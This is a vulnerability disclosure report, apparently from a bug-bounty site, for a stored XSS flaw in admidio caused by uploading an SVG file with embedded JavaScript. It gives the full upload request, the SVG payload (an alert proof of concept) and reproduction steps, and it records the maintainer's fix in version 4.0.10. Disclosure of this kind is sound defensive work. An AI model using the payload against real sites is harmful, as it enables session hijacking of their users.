Cross-site Scripting (XSS) - Stored in admidio/admidio

Valid

Reported on

Oct 8th 2021


Description

Stored XSS via upload file .svg allows for arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo_en/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=1 HTTP/2
Host: www.admidio.org
Cookie: ADMIDIO_DEMO_d00c3e23_demo_en_SESSION_ID=0ee35dd07ba4a64727e8c9a3463c66d6; ADMIDIO_ADMIDIO_admlogin_adm_SESSION_ID=7aa0730b932b697b593707e5d41805a7; _pk_id.1.d9e6=1cd59d39301bbfdc.1633690352.; _pk_ses.1.d9e6=1; __gads=ID=68d51478d1a7acbc-227a19c950cc00b9:T=1633690355:RT=1633690355:S=ALNI_MbmgpMba4eYhn7CGTCqPzYrO6UYWw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------325519286641775463042068650248
Content-Length: 647
Origin: https://www.admidio.org
Referer: https://www.admidio.org/demo_en/adm_program/system/file_upload.php?module=documents_files&id=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------325519286641775463042068650248
Content-Disposition: form-data; name="files[]"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>
-----------------------------325519286641775463042068650248--

Step to Reproduct

Create a file .svg contain payload

Example

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("Ghostlulz XSS");
   </script>
</svg>

Goto Documents & Files choose to Upload Files

The xss will trigger when view file

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the admidio team and are waiting to hear back 18 days ago
admidio/admidio maintainer validated this vulnerability 17 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus
11 days ago

Maintainer


We have implemented a whitelist in version 4.0.10 which is just released. Within this whitelist svg is not listed. Thanks for the hint.

Markus Faßbender confirmed that a fix has been merged on cb51a9 11 days ago
Markus Faßbender has been awarded the fix bounty